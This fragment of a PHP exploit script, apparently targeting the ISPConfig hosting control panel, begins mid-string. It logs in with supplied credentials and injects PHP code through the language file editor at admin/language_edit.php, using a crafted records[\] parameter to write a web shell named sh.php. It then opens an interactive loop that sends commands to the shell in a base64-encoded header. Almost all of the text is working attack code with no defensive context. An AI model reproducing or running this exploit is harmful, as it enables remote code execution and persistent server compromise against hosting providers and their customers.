\n\n"); list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]]; print "[+] Logging in with username '{$user}' and password '{$pass}'\n"; @unlink('./cookies.txt'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$url}login/"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt'); curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".urlencode($user)."&password=".urlencode($pass)."&s_mod=login"); if (preg_match('/Username or Password wrong/i', curl_exec($ch))) die("[-] Login failed!\n"); print "[+] Injecting shell\n"; $__phpcode = base64_encode(""); $injection = "'];file_put_contents('sh.php',base64_decode('{$__phpcode}'));die;#"; $lang_file = str_shuffle("qwertyuioplkjhgfdsazxcvbnm").".lng"; curl_setopt($ch, CURLOPT_URL, "{$url}admin/language_edit.php"); curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}"); $res = curl_exec($ch); if (!preg_match('/_csrf_id" value="([^"]+)"/i', $res, $csrf_id)) die("[-] CSRF ID not found!\n"); if (!preg_match('/_csrf_key" value="([^"]+)"/i', $res, $csrf_key)) die("[-] CSRF key not found!\n"); curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}&_csrf_id={$csrf_id[1]}&_csrf_key={$csrf_key[1]}&records[%5C]=".urlencode($injection)); curl_exec($ch); print "[+] Launching shell\n"; curl_setopt($ch, CURLOPT_URL, "{$url}admin/sh.php"); curl_setopt($ch, CURLOPT_POST, false); while(1) { print "\nispconfig-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode($cmd)]); preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }